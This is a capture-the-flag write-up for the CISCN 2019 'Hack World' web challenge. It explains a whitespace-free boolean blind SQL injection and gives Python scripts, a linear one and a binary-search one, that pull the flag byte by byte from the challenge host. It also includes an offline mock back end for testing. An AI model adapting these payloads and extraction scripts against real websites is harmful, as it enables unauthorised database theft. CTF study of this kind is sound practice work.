【CISCN 2019 North China Day2】Web1

Challenge

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Hack World</title>
</head>
<body>
<h3>All You Want Is In Table 'flag' and the column is 'flag'</h3>
<h3>Now, just give the id of passage</h3>
<form action="http://node4.anna.nssctf.cn:28181/index.php" method="POST">
<input type="text" name="id">
<input type="submit">
</form>


</body></html>

Approach

The page accepts a single POST parameter, id, and renders the passage for that id; nothing from the flag table is ever printed, so this is a boolean-based blind SQL injection over POST. Two facts carry the attack, both confirmed by the exploit below: the hint names the target as column flag in table flag, and the response for id=1 contains "Hello" while the response for id=2 does not, which gives us a true/false oracle. The payload if(ascii(substr((select(flag)from(flag)),i,1))=N,1,2) evaluates to 1 when the i-th byte of the flag has ASCII value N and to 2 otherwise, so checking the response for "Hello" answers one yes/no question per request. The payload is deliberately written without any spaces ((select(flag)from(flag)) instead of select flag from flag), the usual shape when the filter rejects whitespace; keep that shape if you modify it.

EXP

import string
import requests
import time  # pause between positions so the target is not hammered

res = ""
url = "http://node4.anna.nssctf.cn:28181/index.php"
session = requests.Session()  # reuse one connection for the many requests

for i in range(1, 60):  # position of the byte being recovered (1-based, as substr() expects)
    found = False  # set once the byte at this position is identified
    for j in string.printable:  # try every printable character
        # if() yields row id 1 when the comparison is true and row id 2 otherwise;
        # no spaces anywhere in the payload, parentheses do the separating
        sql = 'if(ascii(substr((select(flag)from(flag)),{0},1))={1},1,2)'.format(i, ord(j))
        post = {"id": sql}
        print(f"Trying position {i} with character '{j}'...")
        result = session.post(url=url, data=post)
        if 'Hello' in result.text:  # the row for id 1 contains 'Hello'; the row for id 2 does not
            res += j
            print(f"Found character at position {i}: '{j}'")
            print(f"Current flag: {res}")
            found = True
            break  # next position
    if not found:  # nothing matched: we are past the end of the flag
        print(f"No character found at position {i}. Stopping...")
        break
    time.sleep(1)

print("Final flag:", res)
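The script above spends up to 100 requests per byte because it tests '=' against every printable character. The same oracle supports a binary search if the comparison is changed to '>', which brings it down to about seven requests per byte. The following is an added example, not code from the original write-up: it keeps the write-up's payload shape (no whitespace, if() mapping true/false to row ids 1 and 2, "Hello" marking the id-1 row) and adds a constructed offline stand-in for the challenge back end so the extraction logic can be run and checked without the target. Assumptions, labelled in the code: that '>' passes the filter as '=' does, that the filter rejects whitespace, that ascii() of an empty substr() is 0 (MySQL behaviour), and the constructed flag and page bodies, which are invented for the demo.

```python
import re

# Payload shape from the write-up: no whitespace, if() turns the comparison into a row id
# (1 when true, 2 when false). Only the operator differs: '>' lets us binary-search the byte.
# Assumption: '>' passes the challenge's filter just as '=' does.
PAYLOAD = "if(ascii(substr((select(flag)from(flag)),{pos},1))>{n},1,2)"


def build_payload(pos: int, n: int) -> str:
    """SQL fragment asking: is byte <pos> (1-based) of the flag greater than <n>?"""
    return PAYLOAD.format(pos=pos, n=n)


def extract_flag(oracle, max_len: int = 60) -> str:
    """Recover the flag through a boolean oracle.

    oracle(payload) returns True when the page for row id 1 ('Hello') came back.
    In MySQL, substr() past the end returns '' and ascii('') is 0, so a failing
    'byte > 0' test means we have run off the end of the flag.
    """
    flag = ""
    for pos in range(1, max_len + 1):
        if not oracle(build_payload(pos, 0)):
            break  # ascii('') == 0: no byte at this position
        lo, hi = 0, 127  # invariant: lo < byte <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(build_payload(pos, mid)):
                lo = mid
            else:
                hi = mid
        flag += chr(hi)
    return flag


# Constructed stand-in for the challenge back end so this runs offline. It accepts exactly
# the payload shape above and answers the way the real page did: the id-1 row contains
# 'Hello', the id-2 row does not. Anything else is treated as blocked (no 'Hello').
FAKE_FLAG = "flag{constructed_example_only}"  # constructed, not the real flag
ROWS = {1: "Hello, this is passage one", 2: "This is passage two"}  # constructed page bodies
_PAYLOAD_RE = re.compile(
    r"^if\(ascii\(substr\(\(select\(flag\)from\(flag\)\),(\d+),1\)\)>(\d+),1,2\)$"
)


def fake_page(payload: str) -> str:
    if " " in payload:
        return "blocked"  # assumption: the filter rejects whitespace
    m = _PAYLOAD_RE.match(payload)
    if not m:
        return "blocked"
    pos, n = int(m.group(1)), int(m.group(2))
    byte = ord(FAKE_FLAG[pos - 1]) if pos <= len(FAKE_FLAG) else 0  # ascii('') == 0
    return ROWS[1 if byte > n else 2]


def fake_oracle(payload: str) -> bool:
    return "Hello" in fake_page(payload)


def remote_oracle(url: str):
    """Oracle against the live target (not exercised offline). Assumes, like the
    write-up's script, that the response for row id 1 contains 'Hello'."""
    import requests  # imported lazily so the offline demo does not need it

    session = requests.Session()

    def oracle(payload: str) -> bool:
        return "Hello" in session.post(url, data={"id": payload}).text

    return oracle


if __name__ == "__main__":
    print(extract_flag(fake_oracle))  # offline demo against FAKE_FLAG
    # Live target: extract_flag(remote_oracle("http://node4.anna.nssctf.cn:28181/index.php"))
```

Swapping fake_oracle for remote_oracle(url) is the only change needed to run it against the real endpoint; the extraction logic and the payload builder are untouched, which is the point of keeping the oracle as a separate callable.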
